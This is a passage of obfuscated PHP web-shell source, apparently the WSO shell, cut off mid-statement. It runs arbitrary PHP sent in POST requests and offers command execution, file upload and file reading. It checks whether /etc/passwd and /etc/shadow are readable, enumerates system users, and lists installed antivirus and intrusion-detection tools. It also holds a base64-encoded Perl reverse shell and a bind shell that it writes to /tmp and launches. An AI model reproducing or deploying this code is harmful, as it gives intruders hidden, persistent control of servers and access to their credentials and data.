1066 $tmp = ob_get_clean();
1067 goto ec2f3;
1068 ec2f3:
1069 $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
1070 goto a3349;
1071 E61e4:
1072 }
1073 goto Ebd00;
1074 d2d9b:
1075 if (isset($_POST['ajax'])) {
1076 goto c68c0;
1077 E0e4e:
1078 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
1079 goto e846d;
1080 F5cd8:
1081 eval($_POST['p1']);
1082 goto E0e4e;
1083 f2cb9:
1084 exit;
1085 goto Ed33d;
1086 e846d:
1087 echo strlen($temp), "\n", $temp;
1088 goto f2cb9;
1089 c68c0:
1090 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
1091 goto B9d58;
1092 B9d58:
1093 ob_start();
1094 goto F5cd8;
1095 Ed33d:
1096 }
1097 goto cb220;
1098 Ebd00:
1099 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
1100 goto be918;
1101 c0306:
1102 echo '</pre></div>';
1103 goto B1c9c;
1104 aa455:
1105 LoJWfHeader();
1106 goto c5d86;
1107 A8625:
1108}
1109goto B1eb7;
1110F5dac:
1111if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
1112 $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax;
1113}
1114goto a00d4;
1115a63d5:
1116$auth_pass = "";
1117goto B19c6;
1118dd196:
1119function actionSecInfo()
1120{
1121 goto a3107;
1122 B02cd:
1123 echo '<br>';
1124 goto c0e66;
1125 a0884:
1126 if (function_exists('oci_connect')) {
1127 $temp[] = "Oracle";
1128 }
1129 goto f385d;
1130 A99d7:
1131 LoJWfSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
1132 goto a2a0c;
1133 Bd8ec:
1134 LoJWfSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1135 goto B7ff2;
1136 E6299:
1137 function LoJWfSecParam($n, $v)
1138 {
1139 $v = trim($v);
1140 if ($v) {
1141 echo '<span>' . $n . ': </span>';
1142 if (strpos($v, "\n") === false) {
1143 echo $v . '<br>';
1144 } else {
1145 echo '<pre class=ml1>' . $v . '</pre>';
1146 }
1147 }
1148 }
1149 goto dce9a;
1150 f9e8f:
1151 echo '<h1>Server security information</h1><div class=content>';
1152 goto E6299;
1153 F08d5:
1154 $temp = array();
1155 goto D7e61;
1156 B7ff2:
1157 LoJWfSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1158 goto Cf8bb;
1159 F1d15:
1160 if (function_exists('apache_get_modules')) {
1161 LoJWfSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
1162 }
1163 goto A99d7;
1164 D7e61:
1165 if (function_exists('mysql_get_client_info')) {
1166 $temp[] = "MySql (" . mysql_get_client_info() . ")";
1167 }
1168 goto A1909;
1169 D31df:
1170 if (function_exists('pg_connect')) {
1171 $temp[] = "PostgreSQL";
1172 }
1173 goto a0884;
1174 c0e66:
1175 if ($GLOBALS['os'] == 'nix') {
1176 goto C3d24;
1177 C3d24:
1178 LoJWfSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
1179 goto e9b78;
1180 d034a:
1181 LoJWfSecParam('OS version', @file_get_contents('/proc/version'));
1182 goto F2046;
1183 e9b78:
1184 LoJWfSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
1185 goto d034a;
1186 Bc1ec:
1187 if (!$GLOBALS['safe_mode']) {
1188 goto f41f1;
1189 D81c4:
1190 e155f:
1191 goto B96d2;
1192 C54a8:
1193 foreach ($danger as $item) {
1194 if (LoJWfWhich($item)) {
1195 $temp[] = $item;
1196 }
1197 Bad62:
1198 }
1199 goto f8ef8;
1200 b0ad7:
1201 $temp = array();
1202 goto a162c;
1203 A2139:
1204 d9912:
1205 goto Ec75b;
1206 b8d10:
1207 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
1208 goto E4de2;
1209 ab3f5:
1210 $temp = array();
1211 goto C54a8;
1212 E4de2:
1213 if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
1214 goto ed7ee;
1215 D9572:
1216 $_POST['p2']++;
1217 goto f7a0d;
1218 A49c2:
1219 dc0c3:
1220 goto D9572;
1221 e7ce7:
1222 if ($uid) {
1223 $temp .= join(':', $uid) . "\n";
1224 }
1225 goto A49c2;
1226 ed7ee:
1227 $temp = "";
1228 goto e457a;
1229 e85eb:
1230 LoJWfSecParam('Users', $temp);
1231 goto c32f2;
1232 f32c6:
1233 echo '<br/>';
1234 goto e85eb;
1235 f0a29:
1236 $uid = @posix_getpwuid($_POST['p2']);
1237 goto e7ce7;
1238 f7a0d:
1239 goto E5e67;
1240 goto eb39a;
1241 eb39a:
1242 ba5ae:
1243 goto f32c6;
1244 e457a:
1245 E5e67:
1246 goto a352f;
1247 a352f:
1248 if (!($_POST['p2'] <= $_POST['p3'])) {
1249 goto ba5ae;
1250 }
1251 goto f0a29;
1252 c32f2:
1253 }
1254 goto Eb6fb;
1255 C5991:
1256 LoJWfSecParam('Hosts', @file_get_contents('/etc/hosts'));
1257 goto b8d10;
1258 a4b76:
1259 LoJWfSecParam('HDD space', LoJWfEx('df -h'));
1260 goto C5991;
1261 a162c:
1262 foreach ($userful as $item) {
1263 if (LoJWfWhich($item)) {
1264 $temp[] = $item;
1265 }
1266 Fddab:
1267 }
1268 goto D81c4;
1269 aea68:
1270 foreach ($downloaders as $item) {
1271 if (LoJWfWhich($item)) {
1272 $temp[] = $item;
1273 }
1274 c0f2d:
1275 }
1276 goto A2139;
1277 F1b88:
1278 $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
1279 goto bf659;
1280 bf659:
1281 $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
1282 goto df8cd;
1283 B96d2:
1284 LoJWfSecParam('Userful', implode(', ', $temp));
1285 goto ab3f5;
1286 f984b:
1287 $temp = array();
1288 goto aea68;
1289 e62e2:
1290 echo '<br/>';
1291 goto a4b76;
1292 df8cd:
1293 echo '<br>';
1294 goto b0ad7;
1295 Ec75b:
1296 LoJWfSecParam('Downloaders', implode(', ', $temp));
1297 goto e62e2;
1298 f41f1:
1299 $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
1300 goto F1b88;
1301 A6964:
1302 LoJWfSecParam('Danger', implode(', ', $temp));
1303 goto f984b;
1304 f8ef8:
1305 Fcccc:
1306 goto A6964;
1307 Eb6fb:
1308 }
1309 goto ad5e9;
1310 F2046:
1311 LoJWfSecParam('Distr name', @file_get_contents('/etc/issue.net'));
1312 goto Bc1ec;
1313 ad5e9:
1314 } else {
1315 goto E79dd;
1316 E79dd:
1317 LoJWfSecParam('OS Version', LoJWfEx('ver'));
1318 goto a8d4c;
1319 De698:
1320 LoJWfSecParam('User Accounts', LoJWfEx('net user'));
1321 goto bdb49;
1322 a8d4c:
1323 LoJWfSecParam('Account Settings', LoJWfEx('net accounts'));
1324 goto De698;
1325 bdb49:
1326 }
1327 goto A5775;
1328 f9c99:
1329 LoJWfFooter();
1330 goto Fba37;
1331 f385d:
1332 LoJWfSecParam('Supported databases', implode(', ', $temp));
1333 goto B02cd;
1334 a2a0c:
1335 LoJWfSecParam('Open base dir', @ini_get('open_basedir'));
1336 goto Bd8ec;
1337 Cf8bb:
1338 LoJWfSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
1339 goto F08d5;
1340 dce9a:
1341 LoJWfSecParam('Server software', @getenv('SERVER_SOFTWARE'));
1342 goto F1d15;
1343 A5775:
1344 echo '</div>';
1345 goto f9c99;
1346 a3107:
1347 LoJWfHeader();
1348 goto f9e8f;
1349 A1909:
1350 if (function_exists('mssql_connect')) {
1351 $temp[] = "MSSQL";
1352 }
1353 goto D31df;
1354 Fba37:
1355}
1356goto fe83f;
1357d95ad:
1358function LoJWfHeader()
1359{
1360 goto a8a4a;
1361 ad649:
1362 $totalSpace = @disk_total_space($GLOBALS['cwd']);
1363 goto A45e1;
1364 B4d65:
1365 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . LoJWfViewSize($totalSpace) . ' <span>Free:</span> ' . LoJWfViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . LoJWfPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
1366 goto C9de7;
1367 ce8d7:
1368 $path = explode("/", $GLOBALS['cwd']);
1369 goto F5e74;
1370 bcf68:
1371 goto B0ec1;
1372 goto d9192;
1373 a8a4a:
1374 if (empty($_POST['charset'])) {
1375 $_POST['charset'] = $GLOBALS['default_charset'];
1376 }
1377 goto B51e2;
1378 d9192:
1379 aa0e2:
1380 goto eae24;
1381 d74e4:
1382 B3eed:
1383 goto Cdbc6;
1384 b3d0c:
1385 $m['Self remove'] = 'SelfRemove';
1386 goto cb37c;
1387 df457:
1388 $j++;
1389 goto bcf68;
1390 D15f7:
1391 b254d:
1392 goto E8350;
1393 F3517:
1394 A533d:
1395 goto D5e8e;
1396 b58e0:
1397 goto A533d;
1398 goto F9908;
1399 eeb92:
1400 $j = 0;
1401 goto ca188;
1402 c521c:
1403 foreach ($charsets as $item) {
1404 $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
1405 ef75d:
1406 }
1407 goto d74e4;
1408 Bb514:
1409 foreach ($m as $k => $v) {
1410 $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
1411 b9bd2:
1412 }
1413 goto D15f7;
1414 ae883:
1415 if ($GLOBALS['os'] == 'win') {
1416 foreach (range('c', 'z') as $drive) {
1417 if (is_dir($drive . ':\\')) {
1418 $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
1419 }
1420 C366d:
1421 }
1422 cb071:
1423 }
1424 goto B4d65;
1425 A22bc:
1426 $kernel = @php_uname('s');
1427 goto ae0ab;
1428 F5e74:
1429 $n = count($path);
1430 goto E1c45;
1431 Ebe19:
1432 if (!function_exists('posix_getegid')) {
1433 goto E4f58;
1434 E0bd8:
1435 $uid = @getmyuid();
1436 goto Fb571;
1437 A8c1b:
1438 $group = "?";
1439 goto D38b0;
1440 Fb571:
1441 $gid = @getmygid();
1442 goto A8c1b;
1443 E4f58:
1444 $user = @get_current_user();
1445 goto E0bd8;
1446 D38b0:
1447 } else {
1448 goto D7388;
1449 Ab360:
1450 $group = $gid['name'];
1451 goto C8ce4;
1452 B3e46:
1453 $user = $uid['name'];
1454 goto Ed111;
1455 Ed111:
1456 $uid = $uid['uid'];
1457 goto Ab360;
1458 E7224:
1459 $gid = @posix_getgrgid(posix_getegid());
1460 goto B3e46;
1461 D7388:
1462 $uid = @posix_getpwuid(posix_geteuid());
1463 goto E7224;
1464 C8ce4:
1465 $gid = $gid['gid'];
1466 goto ba49a;
1467 ba49a:
1468 }
1469 goto Cd175;
1470 bf5ed:
1471 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
1472 goto eeb92;
1473 B51e2:
1474 global $color;
1475 goto df8b3;
1476 ca188:
1477 B0ec1:
1478 goto B8c51;
1479 B4299:
1480 fe2fe:
1481 goto b8e81;
1482 D5e8e:
1483 if (!($i < $n - 1)) {
1484 goto Fabb0;
1485 }
1486 goto bf5ed;
1487 dd2e0:
1488 if (strpos('Linux', $kernel) !== false) {
1489 $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
1490 } else {
1491 $explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
1492 }
1493 goto Ebe19;
1494 E5a23:
1495 if (!empty($GLOBALS['auth_pass'])) {
1496 $m['Logout'] = 'Logout';
1497 }
1498 goto b3d0c;
1499 Cd175:
1500 $cwd_links = '';
1501 goto ce8d7;
1502 d88ad:
1503 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
1504 goto Ad6ba;
1505 Ad6ba:
1506 $opt_charsets = '';
1507 goto c521c;
1508 ae0ab:
1509 $explink = '';
1510 goto dd2e0;
1511 Cdbc6:
1512 $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
1513 goto E5a23;
1514 E1c45:
1515 $i = 0;
1516 goto F3517;
1517 B8c51:
1518 if (!($j <= $i)) {
1519 goto aa0e2;
1520 }
1521 goto E35cd;
1522 b8e81:
1523 $i++;
1524 goto b58e0;
1525 F9908:
1526 Fabb0:
1527 goto d88ad;
1528 cb37c:
1529 $menu = '';
1530 goto Bb514;
1531 c42ac:
1532 $release = @php_uname('r');
1533 goto A22bc;
1534 A45e1:
1535 $totalSpace = $totalSpace ? $totalSpace : 1;
1536 goto c42ac;
1537 E8350:
1538 $drives = "";
1539 goto ae883;
1540 F37a1:
1541 $freeSpace = @diskfreespace($GLOBALS['cwd']);
1542 goto ad649;
1543 df8b3:
1544 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";
1545 goto F37a1;
1546 a3cae:
1547 c787c:
1548 goto df457;
1549 E35cd:
1550 $cwd_links .= $path[$j] . '/';
1551 goto a3cae;
1552 eae24:
1553 $cwd_links .= "\")'>" . $path[$i] . "/</a>";
1554 goto B4299;
1555 C9de7:
1556}
1557goto Ef27e;
1558Ef27e:
1559function LoJWfFooter()
1560{
1561 $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
1562 echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>";
1563}
1564goto Abb8b;
1565B4ecb:
1566@ini_set('error_log', NULL);
1567goto acd2d;
1568f0d26:
1569function LoJWfPerms($p)
1570{
1571 goto B47c9;
1572 e4357:
1573 $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
1574 goto dd8c7;
1575 Cae5d:
1576 $i .= $p & 0x4 ? 'r' : '-';
1577 goto f8c69;
1578 Fc39c:
1579 $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
1580 goto E1ff9;
1581 ef1a1:
1582 $i .= $p & 0x80 ? 'w' : '-';
1583 goto Fc39c;
1584 E1ff9:
1585 $i .= $p & 0x20 ? 'r' : '-';
1586 goto Da599;
1587 dd8c7:
1588 return $i;
1589 goto A5c8f;
1590 B47c9:
1591 if (($p & 0xc000) == 0xc000) {
1592 $i = 's';
1593 } elseif (($p & 0xa000) == 0xa000) {
1594 $i = 'l';
1595 } elseif (($p & 0x8000) == 0x8000) {
1596 $i = '-';
1597 } elseif (($p & 0x6000) == 0x6000) {
1598 $i = 'b';
1599 } elseif (($p & 0x4000) == 0x4000) {
1600 $i = 'd';
1601 } elseif (($p & 0x2000) == 0x2000) {
1602 $i = 'c';
1603 } elseif (($p & 0x1000) == 0x1000) {
1604 $i = 'p';
1605 } else {
1606 $i = 'u';
1607 }
1608 goto f4172;
1609 f4172:
1610 $i .= $p & 0x100 ? 'r' : '-';
1611 goto ef1a1;
1612 d9a7d:
1613 $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
1614 goto Cae5d;
1615 Da599:
1616 $i .= $p & 0x10 ? 'w' : '-';
1617 goto d9a7d;
1618 f8c69:
1619 $i .= $p & 0x2 ? 'w' : '-';
1620 goto e4357;
1621 A5c8f:
1622}
1623goto cb151;
1624fb74c:
1625if (!$safe_mode) {
1626 error_reporting(0);
1627}
1628goto D38e6;
1629aee81:
1630if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
1631 call_user_func('action' . $_POST['a']);
1632}
1633goto Fd70f;
1634A379f:
1635function actionNetwork()
1636{
1637 goto Ac40c;
1638 Ac40c:
1639 LoJWfHeader();
1640 goto A0d3d;
1641 a71ee:
1642 echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>";
1643 goto Bef7f;
1644 A0d3d:
1645 $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1646 goto da7e4;
1647 C8186:
1648 LoJWfFooter();
1649 goto b9677;
1650 Cb482:
1651 echo '</div>';
1652 goto C8186;
1653 Bef7f:
1654 if (isset($_POST['p1'])) {
1655 goto ff765;
1656 E2218:
1657 if ($_POST['p1'] == 'bcp') {
1658 goto b7a01;
1659 E7db8:
1660 $out = LoJWfEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
1661 goto c061f;
1662 c061f:
1663 sleep(1);
1664 goto Aac9e;
1665 b7a01:
1666 cf("/tmp/bc.pl", $back_connect_p);
1667 goto E7db8;
1668 cdb59:
1669 unlink("/tmp/bc.pl");
1670 goto b81ec;
1671 Aac9e:
1672 echo "<pre class=ml1>{$out}\n" . LoJWfEx("ps aux | grep bc.pl") . "</pre>";
1673 goto cdb59;
1674 b81ec:
1675 }
1676 goto c4639;
1677 ff765:
1678 function cf($f, $t)
1679 {
1680 $w = @fopen($f, "w") or @function_exists('file_put_contents');
1681 if ($w) {
1682 @fwrite($w, @base64_decode($t));
1683 @fclose($w);
1684 }
1685 }
1686 goto f8079;
1687 f8079:
1688 if ($_POST['p1'] == 'bpp') {
1689 goto d35c8;
1690 d35c8:
1691 cf("/tmp/bp.pl", $bind_port_p);
1692 goto D030c;
1693 ecbdd:
1694 unlink("/tmp/bp.pl");
1695 goto c42e1;
1696 B4f16:
1697 echo "<pre class=ml1>{$out}\n" . LoJWfEx("ps aux | grep bp.pl") . "</pre>";
1698 goto ecbdd;
1699 Bdeba:
1700 sleep(1);
1701 goto B4f16;
1702 D030c:
1703 $out = LoJWfEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
1704 goto Bdeba;
1705 c42e1:
1706 }
1707 goto E2218;
1708 c4639:
1709 }
1710 goto Cb482;
1711 da7e4:
1712 $bind_port_p = 